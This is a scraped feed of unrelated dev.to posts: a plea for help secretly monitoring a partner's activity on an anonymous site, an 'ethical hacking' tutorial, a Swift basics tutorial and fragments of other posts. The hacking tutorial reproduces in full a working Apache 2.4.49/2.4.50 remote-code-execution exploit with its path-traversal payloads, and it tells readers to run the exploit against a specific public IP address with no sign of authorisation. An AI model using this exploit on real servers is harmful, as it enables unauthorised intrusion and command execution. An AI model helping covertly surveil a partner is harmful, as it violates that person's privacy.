2024-07-05T00:12:19
https://dev.to/steven_r_08cc0b16d47dd777/need-help-with-a-project-4pm1
android, beginners, learning
Hi everyone. I am seeking some help on a project that will hopefully, in time, save my relationship and give me some peace of mind to help keep me sane. My partner and I are a gay couple, and we like to have fun from time to time. When we do our thing, we use a website that has a lot of different aspects to it. My need here is a way to potentially monitor his activity through the website. The catch is that you don't have to have a registered profile; in fact, most profiles on there are anonymous. So instead of monitoring his account, I think monitoring the area would be more reasonable, but with notifications only when certain triggers are met. If that makes any sense... Please, someone help me. I dearly love my fiancé, but this website is going to ruin our relationship, and I'd rather know than look dumb and clueless if something is going on.
steven_r_08cc0b16d47dd777
1,912,055
I have Built E-commerce Website for my Client
![Image...
0
2024-07-05T00:04:35
https://dev.to/uzair_rai12/i-have-built-e-commerce-website-for-my-client-15fp
wordpress, webdev, css
![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2tmlve3ky337kgllkhht.jpg) ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/vc8llnwpndrbr22u96p8.jpg) ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0ui7w3p73un7sstpj72e.jpg)
uzair_rai12
1,912,054
Server side (vulnerability scanning)
Ethical Hacking Visit the github project: https://github.com/samglish/ServerSide ...
0
2024-07-05T00:02:53
https://dev.to/samglish/server-side-vulnerability-scanning-1hf9
server, dirbuster, vulnerability, skipfish
**Ethical Hacking** Visit the github project: [https://github.com/samglish/ServerSide](https://github.com/samglish/ServerSide) ## Tools <hr> * Skipfish * Owasp Disrbuster * Webslayer * Nmap * Nessus ### The first scanner we will use Nmap <hr> to see the services running, launch nmap. ```bash nmap -sV 145.14.145.161 ``` output ``` Starting Nmap 7.91 ( https://nmap.org ) at 2024-07-04 22:50 WAT Nmap scan report for 145.14.145.161 Host is up (0.28s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp? 80/tcp open http awex 443/tcp open ssl/https awex 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ``` You can retrieve the services that are running or go directly to retrieve them from the database. <a href="https://www.exploit-db.com/">https://www.exploit-db.com/</a> <br> Service:`http` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/1ejrwm59s8smoj4sgqqs.png) * Download the python file exploit ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/i87frcny6d1ljklk63ae.png) * Look the python file ```python # Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3) # Date: 11/11/2021 # Exploit Author: Valentin Lobstein # Vendor Homepage: https://apache.org/ # Version: Apache 2.4.49/2.4.50 (CGI enabled) # Tested on: Debian GNU/Linux # CVE : CVE-2021-41773 / CVE-2021-42013 # Credits : Lucas Schnell #!/usr/bin/env python3 #coding: utf-8 import os import re import sys import time import requests from colorama import Fore,Style header = '''\033[1;91m ▄▄▄ ██▓███ ▄▄▄ ▄████▄ ██░ ██ ▓█████ ██▀███ ▄████▄ ▓█████ ▒████▄ ▓██░ ██▒▒████▄ ▒██▀ ▀█ ▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ▓█ ▀ ▒██ ▀█▄ ▓██░ ██▓▒▒██ ▀█▄ ▒▓█ ▄ ▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▒███ ░██▄▄▄▄██ ▒██▄█▓▒ ▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▒▓█ ▄ ▓█ ▓██▒▒██▒ ░ ░ ▓█ ▓██▒▒ ▓███▀ ░░▓█▒░██▓░▒████▒ ░██▓ ▒██▒▒ ▓███▀ ░░▒████▒ ▒▒ ▓▒█░▒▓▒░ ░ ░ ▒▒ ▓▒█░░ ░▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░ ░ ▒▓ ░▒▓░░ ░▒ ▒ ░░░ ▒░ ░ ▒ ▒▒ ░░▒ ░ ▒ ▒▒ ░ ░ ▒ ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░ ░ ░ ░ ▒ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ ░ ░ ''' + Style.RESET_ALL if len(sys.argv) < 2 : print( 'Use: python3 file.py ip:port ' ) sys.exit() def end(): print("\t\033[1;91m[!] 
Bye bye !") time.sleep(0.5) sys.exit(1) def commands(url,command,session): directory = mute_command(url,'pwd') user = mute_command(url,'whoami') hostname = mute_command(url,'hostname') advise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\'t an interactive shell)') command = input(f"{Fore.RED}╭─{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\n{Fore.RED}╰─{Fore.YELLOW}$ {Style.RESET_ALL}") command = f"echo; {command};" req = requests.Request('POST', url=url, data=command) prepare = req.prepare() prepare.url = url response = session.send(prepare, timeout=5) output = response.text print(output) if 'clear' in command: os.system('/usr/bin/clear') print(header) if 'exit' in command: end() def mute_command(url,command): session = requests.Session() req = requests.Request('POST', url=url, data=f"echo; {command}") prepare = req.prepare() prepare.url = url response = session.send(prepare, timeout=5) return response.text.strip() def exploitRCE(payload): s = requests.Session() try: host = sys.argv[1] if 'http' not in host: url = 'http://'+ host + payload else: url = host + payload session = requests.Session() command = "echo; id" req = requests.Request('POST', url=url, data=command) prepare = req.prepare() prepare.url = url response = session.send(prepare, timeout=5) output = response.text if "uid" in output: choice = "Y" print( Fore.GREEN + '\n[!] Target %s is vulnerable !!!' % host) print("[!] Sortie:\n\n" + Fore.YELLOW + output ) choice = input(Fore.CYAN + "[?] Do you want to exploit this RCE ? (Y/n) : ") if choice.lower() in ['','y','yes']: while True: commands(url,command,session) else: end() else : print(Fore.RED + '\nTarget %s isn\'t vulnerable' % host) except KeyboardInterrupt: end() def main(): try: apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash' apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash' payloads = [apache2449_payload,apache2450_payload] choice = len(payloads) + 1 print(header) print("\033[1;37m[0] Apache 2.4.49 RCE\n[1] Apache 2.4.50 RCE") while choice >= len(payloads) and choice >= 0: choice = int(input('[~] Choice : ')) if choice < len(payloads): exploitRCE(payloads[choice]) except KeyboardInterrupt: print("\n\033[1;91m[!] Bye bye !") time.sleep(0.5) sys.exit(1) if __name__ == '__main__': main() ``` ## Let's to run file ```bash python3 Explot.py ``` Use: `python3 file.py ip:port` ```bash python3 Explot.py 145.14.145.161:80 ``` ## Use metasploit to exploit <hr> run `msfconsole` in your terminal ```bash sudo msfconsole ``` ```bash .:okOOOkdc' 'cdkOOOko:. .xOOOOOOOOOOOOc cOOOOOOOOOOOOx. :OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO: 'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO' oOOOOOOOO. .oOOOOoOOOOl. ,OOOOOOOOo dOOOOOOOO. .cOOOOOc. ,OOOOOOOOx lOOOOOOOO. ;d; ,OOOOOOOOl .OOOOOOOO. .; ; ,OOOOOOOO. cOOOOOOO. .OOc. 'oOO. ,OOOOOOOc oOOOOOO. .OOOO. :OOOO. ,OOOOOOo lOOOOO. .OOOO. :OOOO. ,OOOOOl ;OOOO' .OOOO. :OOOO. ;OOOO; .dOOo .OOOOocccxOOOO. xOOd. ,kOl .OOOOOOOOOOOOO. .dOk, :kk;.OOOOOOOOOOOOO.cOk: ;kOOOOOOOOOOOOOOOk: ,xOOOOOOOOOOOx, .lOOOOOOOl. ,dOd, . 
=[ metasploit v6.3.5-dev ] + -- --=[ 2296 exploits - 1202 auxiliary - 410 post ] + -- --=[ 962 payloads - 45 encoders - 11 nops ] + -- --=[ 9 evasion ] Metasploit tip: Save the current environment with the save command, future console restarts will use this environment again Metasploit Documentation: https://docs.metasploit.com/ msf6 > search exploit ``` ```bash Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/dos/http/cable_haunt_websocket_dos 2020-01-07 normal No "Cablehaunt" Cable Modem WebSocket DoS 1 exploit/windows/ftp/32bitftp_list_reply 2010-10-12 good No 32bit FTP Client Stack Buffer Overflow 2 exploit/windows/tftp/threectftpsvc_long_mode 2006-11-27 great No 3CTftpSvc TFTP Long Mode Buffer Overflow 3 exploit/windows/ftp/3cdaemon_ftp_user 2005-01-04 average Yes 3Com 3CDaemon 2.0 FTP Username Overflow 4 exploit/windows/scada/igss9_misc 2011-03-24 excellent No 7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities 5 exploit/windows/scada/igss9_igssdataserver_rename 2011-03-24 normal No 7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow 6 exploit/windows/scada/igss9_igssdataserver_listall 2011-03-24 good No 7-Technologies IGSS IGSSdataServer.exe Stack Buffer Overflow 7 exploit/windows/fileformat/a_pdf_wav_to_mp3 2010-08-17 normal No A-PDF WAV to MP3 v1.0.0 Buffer Overflow 8 auxiliary/scanner/http/a10networks_ax_directory_traversal 2014-01-28 normal No A10 Networks AX Loadbalancer Directory Traversal 9 exploit/windows/ftp/aasync_list_reply 2010-10-12 good No AASync v2.2.1.0 (Win32) Stack Buffer Overflow (LIST) 10 exploit/windows/scada/abb_wserver_exec 2013-04-05 excellent Yes ABB MicroSCADA wserver.exe Remote Code Execution 11 exploit/windows/fileformat/abbs_amp_lst 2013-06-30 normal No ABBS Audio Media Player .LST Buffer Overflow 12 exploit/linux/local/abrt_raceabrt_priv_esc 2015-04-14 excellent Yes ABRT raceabrt Privilege Escalation 13 exploit/linux/local/abrt_sosreport_priv_esc 2015-11-23 excellent Yes ABRT sosreport Privilege Escalation 14 exploit/windows/fileformat/acdsee_fotoslate_string 2011-09-12 good No ACDSee FotoSlate PLP File id Parameter Overflow 15 exploit/windows/fileformat/acdsee_xpm 2007-11-23 good No ACDSee XPM File Section Buffer Overflow 16 exploit/linux/local/af_packet_chocobo_root_priv_esc 2016-08-12 good Yes AF_PACKET chocobo_root Privilege Escalation 17 exploit/linux/local/af_packet_packet_set_ring_priv_esc 2017-03-29 good Yes AF_PACKET packet_set_ring Privilege Escalation 18 exploit/windows/sip/aim_triton_cseq 2006-07-10 great No AIM Triton 1.0.4 CSeq Buffer Overflow 19 exploit/windows/misc/ais_esel_server_rce 2019-03-27 excellent Yes AIS logistics ESEL-Server Unauth SQL Injection RCE 20 exploit/aix/rpc_cmsd_opcode21 2009-10-07 great No AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow 21 exploit/windows/misc/allmediaserver_bof 2012-07-04 normal No ALLMediaServer 0.8 Buffer Overflow 22 exploit/windows/fileformat/allplayer_m3u_bof 2013-10-09 normal No ALLPlayer M3U Buffer Overflow 23 exploit/windows/fileformat/aol_phobos_bof 2010-01-20 average No AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow 24 exploit/windows/fileformat/aol_desktop_linktag 2011-01-31 normal No AOL Desktop 9.6 RTX Buffer Overflow 25 exploit/windows/browser/aim_goaway 2004-08-09 great No AOL Instant Messenger goaway Overflow 26 exploit/windows/browser/aol_ampx_convertfile 2009-05-19 normal No AOL Radio AmpX ActiveX Control ConvertFile() 
Buffer Overflow 27 exploit/linux/local/apt_package_manager_persistence 1999-03-09 excellent No APT Package Manager Persistence 28 exploit/windows/browser/asus_net4switch_ipswcom 2012-02-17 normal No ASUS Net4Switch ipswcom.dll ActiveX Stack Buffer Overflow 29 exploit/linux/misc/asus_infosvr_auth_bypass_exec 2015-01-04 excellent No ASUS infosvr Auth Bypass Command Execution 30 exploit/linux/http/atutor_filemanager_traversal 2016-03-01 excellent Yes ATutor 2.2.1 Directory Traversal / Remote Code Execution 31 exploit/multi/http/atutor_sqli 2016-03-01 excellent Yes ATutor 2.2.1 SQL Injection / Remote Code Execution 32 exploit/multi/http/atutor_upload_traversal 2019-05-17 excellent Yes ATutor 2.2.4 - Directory Traversal / Remote Code Execution, 33 exploit/unix/webapp/awstatstotals_multisort 2008-08-26 excellent Yes AWStats Totals multisort Remote Command Execution 34 exploit/unix/webapp/awstats_configdir_exec 2005-01-15 excellent Yes AWStats configdir Remote Command Execution 35 exploit/unix/webapp/awstats_migrate_exec . . . . . . . . . . . 2454 exploit/windows/http/edirectory_imonitor 2005-08-11 great No eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow 2455 exploit/windows/misc/eiqnetworks_esa 2006-07-24 average No eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow 2456 exploit/windows/misc/eiqnetworks_esa_topology 2006-07-25 average No eIQNetworks ESA Topology DELETEDEVICE Overflow 2457 exploit/linux/antivirus/escan_password_exec 2014-04-04 excellent Yes eScan Web Management Console Command Injection 2458 exploit/windows/fileformat/esignal_styletemplate_bof 2011-09-06 normal No eSignal and eSignal Pro File Parsing Buffer Overflow in QUO 2459 exploit/multi/http/extplorer_upload_exec 2012-12-31 excellent Yes eXtplorer v2.1 Arbitrary File Upload Vulnerability 2460 exploit/windows/fileformat/ezip_wizard_bof 2009-03-09 good No eZip Wizard 3.0 Stack Buffer Overflow 2461 exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection 2019-02-26 excellent Yes elFinder PHP Connector exiftran Command Injection 2462 exploit/windows/ftp/freeftpd_user 2005-11-16 average Yes freeFTPd 1.0 Username Overflow 2463 exploit/windows/ftp/freeftpd_pass 2013-08-20 normal Yes freeFTPd PASS Command Buffer Overflow 2464 exploit/windows/fileformat/galan_fileformat_bof 2009-12-07 normal No gAlan 0.2.1 Buffer Overflow 2465 exploit/linux/local/glibc_origin_expansion_priv_esc 2010-10-18 excellent Yes glibc '$ORIGIN' Expansion Privilege Escalation 2466 exploit/linux/local/glibc_realpath_priv_esc 2018-01-16 normal Yes glibc 'realpath()' Privilege Escalation 2467 exploit/linux/local/glibc_ld_audit_dso_load_priv_esc 2010-10-18 excellent Yes glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation 2468 exploit/windows/fileformat/iftp_schedule_bof 2014-11-06 normal No i-FTP Schedule Buffer Overflow 2469 auxiliary/dos/apple_ios/webkit_backdrop_filter_blur 2018-09-15 normal No iOS Safari Denial of Service with CSS 2470 exploit/windows/local/ipass_launch_app 2015-03-12 excellent Yes iPass Mobile Client Service Privilege Escalation 2471 exploit/aix/local/ibstat_path 2013-09-24 excellent Yes ibstat $PATH Privilege Escalation 2472 exploit/qnx/local/ifwatchd_priv_esc 2014-03-10 excellent Yes ifwatchd Privilege Escalation 2473 exploit/windows/browser/lpviewer_url 2008-10-06 normal No iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow 2474 exploit/linux/local/ktsuss_suid_priv_esc 2011-08-13 excellent Yes ktsuss suid Privilege Escalation 2475 exploit/linux/local/lastore_daemon_dbus_priv_esc 2016-02-02 
excellent Yes lastore-daemon D-Bus Privilege Escalation 2476 auxiliary/scanner/ssh/libssh_auth_bypass 2018-10-16 normal No libssh Authentication Bypass Scanner 2477 exploit/windows/browser/mirc_irc_url 2003-10-13 normal No mIRC IRC URL Buffer Overflow 2478 exploit/windows/misc/mirc_privmsg_server 2008-10-02 normal No mIRC PRIVMSG Handling Stack Buffer Overflow 2479 exploit/osx/browser/osx_gatekeeper_bypass 2021-03-25 manual No macOS Gatekeeper check bypass 2480 exploit/osx/local/cfprefsd_race_condition 2020-03-18 excellent Yes macOS cfprefsd Arbitrary File Write Local Privilege Escalation 2481 auxiliary/dos/http/marked_redos normal No marked npm module "heading" ReDoS 2482 exploit/unix/webapp/mybb_backdoor 2011-10-06 excellent Yes myBB 1.6.4 Backdoor Arbitrary Command Execution 2483 exploit/linux/http/op5_config_exec 2016-04-08 excellent Yes op5 v7.1.9 Configuration Command Execution 2484 exploit/unix/webapp/opensis_chain_exec 2020-06-30 excellent Yes openSIS Unauthenticated PHP Code Execution 2485 exploit/unix/webapp/oscommerce_filemanager 2009-08-31 excellent No osCommerce 2.2 Arbitrary PHP Code Execution 2486 exploit/multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution 2487 auxiliary/sniffer/psnuffle normal No pSnuffle Packet Sniffer 2488 exploit/unix/http/pfsense_graph_injection_exec 2016-04-18 excellent No pfSense authenticated graph status RCE 2489 exploit/unix/http/pfsense_group_member_exec 2017-11-06 excellent Yes pfSense authenticated group member RCE 2490 exploit/linux/http/php_imap_open_rce 2018-10-23 good Yes php imap_open Remote Code Execution 2491 exploit/unix/webapp/phpbb_highlight 2004-11-12 excellent No phpBB viewtopic.php Arbitrary Code Execution 2492 exploit/unix/webapp/phpcollab_upload_exec 2017-09-29 excellent Yes phpCollab 2.5.1 Unauthenticated File Upload 2493 exploit/multi/http/phpfilemanager_rce 2015-08-28 excellent Yes phpFileManager 0.9.8 Remote Code Execution 2494 exploit/multi/http/phpldapadmin_query_engine 2011-10-24 excellent Yes phpLDAPadmin query_engine Remote PHP Code Injection 2495 exploit/multi/http/phpmyadmin_3522_backdoor 2012-09-25 normal No phpMyAdmin 3.5.2.2 server_sync.php Backdoor 2496 exploit/multi/http/phpmyadmin_lfi_rce 2018-06-19 good Yes phpMyAdmin Authenticated Remote Code Execution 2497 exploit/multi/http/phpmyadmin_null_termination_exec 2016-06-23 excellent Yes phpMyAdmin Authenticated Remote Code Execution 2498 exploit/multi/http/phpmyadmin_preg_replace 2013-04-25 excellent Yes phpMyAdmin Authenticated Remote Code Execution via preg_replace() 2499 exploit/multi/http/phpscheduleit_start_date 2008-10-01 excellent Yes phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection 2500 exploit/linux/local/ptrace_sudo_token_priv_esc 2019-03-24 excellent Yes ptrace Sudo Token Privilege Escalation 2501 exploit/multi/http/qdpm_upload_exec 2012-06-14 excellent Yes qdPM v7 Arbitrary PHP File Upload Vulnerability 2502 exploit/unix/webapp/rconfig_install_cmd_exec 2019-10-28 excellent Yes rConfig install Command Execution 2503 exploit/linux/local/rc_local_persistence 1980-10-01 excellent No rc.local Persistence 2504 exploit/unix/http/tnftp_savefile 2014-10-28 excellent No tnftp "savefile" Arbitrary Command Execution 2505 auxiliary/dos/http/ua_parser_js_redos normal No ua-parser-js npm module ReDoS 2506 exploit/multi/http/v0pcr3w_exec 2013-03-23 great Yes v0pCr3w Web Shell Remote Code Execution 2507 exploit/multi/http/vbseo_proc_deutf 2012-01-23 excellent Yes vBSEO 
proc_deutf() Remote PHP Code Injection 2508 auxiliary/gather/vbulletin_getindexablecontent_sqli 2020-03-12 normal No vBulletin /ajax/api/content_infraction/getIndexableContent nodeid Parameter SQL Injection 2509 exploit/multi/http/vbulletin_getindexablecontent 2020-03-12 manual Yes vBulletin /ajax/api/content_infraction/getIndexableContent nodeid Parameter SQL Injection 2510 exploit/multi/http/vbulletin_unserialize 2015-11-04 excellent Yes vBulletin 5.1.2 Unserialize Code Execution 2511 exploit/multi/http/vbulletin_widget_template_rce 2020-08-09 excellent Yes vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution. 2512 auxiliary/admin/http/vbulletin_upgrade_admin 2013-10-09 normal No vBulletin Administrator Account Creation 2513 auxiliary/gather/vbulletin_vote_sqli 2013-03-24 normal Yes vBulletin Password Collector via nodeid SQL Injection 2514 exploit/unix/webapp/vbulletin_vote_sqli_exec 2013-03-25 excellent Yes vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection 2515 exploit/unix/webapp/php_vbulletin_template 2005-02-25 excellent Yes vBulletin misc.php Template Name Arbitrary Code Execution 2516 exploit/multi/http/vbulletin_widgetconfig_rce 2019-09-23 excellent Yes vBulletin widgetConfig RCE 2517 exploit/multi/http/vtiger_soap_upload 2013-03-26 excellent Yes vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload 2518 exploit/multi/http/vtiger_php_exec 2013-10-30 excellent Yes vTigerCRM v5.4.0/v5.3.0 Authenticated Remote Code Execution 2519 exploit/multi/misc/w3tw0rk_exec 2015-06-04 excellent Yes w3tw0rk / Pitbul IRC Bot Remote Code Execution 2520 auxiliary/dos/http/ws_dos normal No ws - Denial of Service 2521 exploit/windows/fileformat/xradio_xrl_sehbof 2011-02-08 normal No xRadio 0.95b Buffer Overflow 2522 exploit/unix/http/xdebug_unauth_exec 2017-09-17 excellent Yes xdebug Unauthenticated OS Command Execution Interact with a module by name or index. For example info 2522, use 2522 or use exploit/unix/http/xdebug_unauth_exec ``` ## Use Owasp dirbuster <hr> Lauch dirbuster ```bash dirbuster ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/m1x0ejs0v5nfwn8j0mtz.png) complete the information. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wapn0llpubslvtkxgzt8.png) # exploitation * ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ywc9wgq8on3c16botw88.png) * ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/1khn5hwfij6erj722es5.png) * ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/l3dqnknik6y2hjsikxci.png) ## Use skipfish Launch ```bash skipfish -o /home/samglish/Desktop/SamRapport -S /usr/share/skipfish/dictionaries/minimal.wl http://samglishinc.000webhostapp.com ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/35yi5mad7unupxcetng2.png) Go to SamRapport ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ejet57pjhz43zx26r062.png) Open index.html in your browser ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/bf13txbuopzrkyamujaq.png)
samglish
1,912,668
Swift Essentials: Variables, Data Types, and More (Part 1)
I'm diving headfirst into the "100 Days of SwiftUI" challenge by Paul Hudson, and I'm thrilled to be...
27,965
2024-07-05T11:19:49
https://ionixjunior.dev/swift-essentials-variables-data-types-and-more-part-1/
100daysofswiftui
--- title: Swift Essentials: Variables, Data Types, and More (Part 1) published: true date: 2024-07-05 00:00:00 UTC tags: 100DaysOfSwiftUI canonical_url: https://ionixjunior.dev/swift-essentials-variables-data-types-and-more-part-1/ cover_image: https://ionixjuniordevthumbnail.azurewebsites.net/api/Generate?title=Swift+Essentials%3A+Variables%2C+Data+Types%2C+and+More+%28Part+1%29 series: 100-days-of-swiftui --- I'm diving headfirst into the "100 Days of SwiftUI" challenge by Paul Hudson, and I'm thrilled to be on this journey of discovery. But before I can create dazzling iOS apps, I know that building a strong foundation in Swift is crucial. This blog series, which I'm calling "100DaysOfSwiftUI," is my way of sharing my learning journey with you, especially those who are new to Swift. We'll explore the fundamental building blocks of this powerful language together. In this first part, we'll tackle the core concepts of variables, data types, string interpolation, and enums. These seemingly simple elements are the pillars upon which we'll build more complex and powerful applications in SwiftUI. So buckle up, grab your coffee (or your preferred drink!), and let's embark on this journey together! We'll cover the basics in a clear and engaging way, and by the end, you'll have a solid grasp of the foundational concepts that will empower you to start crafting your own iOS apps. If you don’t know about the [100 Days of SwiftUI](https://www.hackingwithswift.com/100/swiftui), please check out this link. ## Variables and Constants: Storing Data with Flexibility and Immutability In the world of programming, we often need to store data. We have two primary tools for doing this: **variables** and **constants**. Both act as containers for data, but they differ in their flexibility: ### Variables: The Changeable Ones Variables are like labeled boxes in our code that hold data that can be modified. We use the `var` keyword to declare a variable: ```swift var name = "Laura" ``` We can change the value of `name` at any point in our code: ```swift name = "Laura Smith" ``` Now, `name` holds the value “Laura Smith”. ### Constants: The Immutable Ones Constants are like sealed containers. Once you define a constant, its value cannot be changed. We use the `let` keyword to declare a constant: ```swift let name = "Laura" ``` This sets `name` to the value “Laura”, and we cannot assign a different value to it later. Constants are good for preventing accidental changes to important values, ensuring data integrity. They also make your code clearer and more predictable, as the values they hold are fixed. So, consider this when deciding how to use variables and constants in your code. ## Data Types: Defining the Nature of Data In programming, we need a way to categorize the kinds of data our variables and constants can hold. These categories are called **data types**. Think of data types as defining the “nature” or “essence” of the data. They tell Swift how to interpret and manipulate the information. Here are some essential data types in Swift: ### String: For Textual Data The `String` data type represents textual information. It’s used to store anything that can be written or displayed, such as names, addresses, sentences, and even code. ```swift let name = "Laura" var message = "Hello!" ``` ### Int: For Whole Numbers The `Int` data type represents whole numbers (integers), such as 1, 10, 25, 1000, and so on. Integers are commonly used in counters, calculations, and for representing quantities. 
```swift let age = 30 var numberOfItems = 5 ``` ### Float, Double and Decimal: Representing Numbers with Precision In Swift, we have three primary data types for representing numbers with decimal points: `Float`, `Double`, and `Decimal`. While they all handle fractional values, they differ in their precision and memory usage: #### Float: Lower Precision, Smaller Range `Float` uses 32 bits of memory to store its value, offering a smaller range of values and less precision than `Double`. It’s generally used when memory efficiency is a priority and lower precision is acceptable. ```swift let floatNumber: Float = 0.00001 ``` #### Double: High Precision, Large Range `Double` is the most common choice for representing floating-point numbers in Swift. It provides a high degree of precision, making it suitable for calculations requiring a wide range of values. `Double` uses 64 bits of memory to store its value, which is twice the size of `Float`. ```swift let doubleNumber: Double = 0.00001 ``` #### Decimal: High Precision, Financial Calculations `Decimal` is specialized for handling financial calculations where accuracy is paramount. It offers a high degree of precision, especially for numbers with a large number of decimal places. However, it is less computationally efficient than `Double` or `Float` due to its focus on accuracy. `Decimal` is a base-10 number representation that provides high precision, allowing you to store a lot of numbers. To create a `Decimal` value, you can use the following syntax: ```swift let decimalNumber: Decimal = 0.00001 ``` #### Type Annotations As you can see in the samples above, there’s only one keyword that changed in these examples: the type. Here, the type defines what kind of numeric value you’ll store. This is called “type annotations,” and you can use it for all data types or structures. You can create a numeric value simply by creating a variable and assigning a value, but it will be created as a `Double` type by default. ### Bool: For Logical Values The `Bool` data type represents boolean values, which can be either `true` or `false`. Bools are fundamental for decision-making in your code, helping you create conditional statements and logical expressions. ```swift let isAdmin = true var hasError = false ``` ## Arrays, Dictionaries, and Sets So far, we’ve explored data types for individual values: strings, numbers, booleans. But often, we need to store collections of data—multiple values related to each other. This is where arrays, dictionaries, and sets come in handy. ### Arrays: Ordered Collections of Values Arrays are ordered lists of elements of the same data type. Think of them as numbered boxes where you can store a collection of related items. You access elements in an array by their index, starting from zero. ```swift let cities = ["Barcelona", "London", "São Paulo"] print(cities[0]) // Output: Barcelona (first element) print(cities[2]) // Output: São Paulo (third element) ``` Arrays are useful when you need an ordered list of elements of the same type. ### Dictionaries: Key-Value Pairs Dictionaries are unordered collections of key-value pairs. Each key is unique and maps to a corresponding value. Think of dictionaries like a real-world dictionary, where each word (key) has a definition (value). 
```swift let userData = ["name": "Laura", "surname": "Smith", "city": "London"] print(userData["name"]) // Output: Optional("Laura") print(userData["city"]) // Output: Optional("London") ``` Dictionaries are useful when you need to store and retrieve data based on unique keys. ### Sets: Unique and Unordered Collections Sets are unordered collections of unique elements. They don’t allow duplicates, making them useful for checking membership and removing duplicates from a collection. ```swift let uniqueNames = Set(["Laura", "Josh", "Laura", "Marie", "Josh"]) print(uniqueNames.count) // Output: 3 (duplicates removed) ``` Sets are useful when you need to work with unique values or when you want to check for membership quickly - this structure is very fast. ## Enums: Defining Related Values Enums, short for enumerations, are a powerful way to define a custom type that represents a set of related values. They provide a more structured and readable way to represent choices or states within your code, compared to using raw integers. Think of enums as creating a vocabulary of specific terms related to a particular concept. For example, imagine you’re building an app that handles order status. Instead of using raw integers like 0, 1, and 2, you can create an enum to represent the order states: ```swift enum OrderStatus { case pending case processing case shipped case delivered case cancelled } ``` Now, instead of using numbers, you can directly use the enum values: ```swift var orderStatus = OrderStatus.pending print(orderStatus) // Output: OrderStatus.pending ``` Enums improve readability. They make your code more self-documenting and easier to understand. They also enforce type safety, preventing you from accidentally assigning incorrect values. ## Cool Things ### String Interpolation An easy way to concatenate strings without using “+” is using interpolation: ```swift let name = "Laura" let surname = "Smith" print("The name of the winner is \(name) \(surname)!") ``` ### Multi-line Strings Sometimes we need to create a multi-line string, and this is very easy in Swift. You just use triple quotes and write your string inside them. Just ensure that the triple quotes are declared on a different line from the string. ```swift var multilineMessage = """ This is the multi-line message. You can add a lot of lines. Don't worry about it! """ ``` ### Bools and the Toggle Function When you create a variable, you can change its value later. So, we can create a bool value and change it using the `toggle` function. ```swift var isAdmin = false print(isAdmin) // Output: false isAdmin.toggle() print(isAdmin) // Output: true ``` ### Dictionary Default As you can see in the dictionary example, when we access the key, we get an optional. This occurs because Swift can’t ensure that there is a value in that key. Because of this, Swift gives us an optional. You can handle this using a property called `default`. This way you don’t get an optional, and your code won’t break if you handle the optional without careful. ```swift let userData = ["name": "Laura", "surname": "Smith", "city": "London"] print(userData["name"]) // Output: Optional("Laura") print(userData["name", default: "Unknown"]) // Output: Laura print(userData["nickname", default: "Unknown"]) // Output: Unknown ``` ## Conclusion We’ve covered a lot of ground in this first part of “100DaysOfSwiftUI”! We’ve explored variables, constants, data types, string interpolation, enums, and some collection types. 
These concepts are essential for understanding how data is stored, manipulated, and used in your code. Understanding these fundamentals is like having a solid foundation upon which you can build more complex structures in your SwiftUI journey. Imagine them as the bricks and mortar that make up the walls of your iOS apps. I encourage you to practice these concepts, experiment with different examples, and don’t hesitate to ask questions. Share your thoughts and experiences in the comments below! Stay tuned for the next part, and let’s continue to build our Swift knowledge together!
ionixjunior
1,912,053
SnippetEase - Free Code Snippet Generator
Are you a tech content writer wanting to share your code on your website in a fancy way? Are you...
0
2024-07-04T23:56:51
https://dev.to/munjitso/snippetease-free-code-snippet-generator-f79
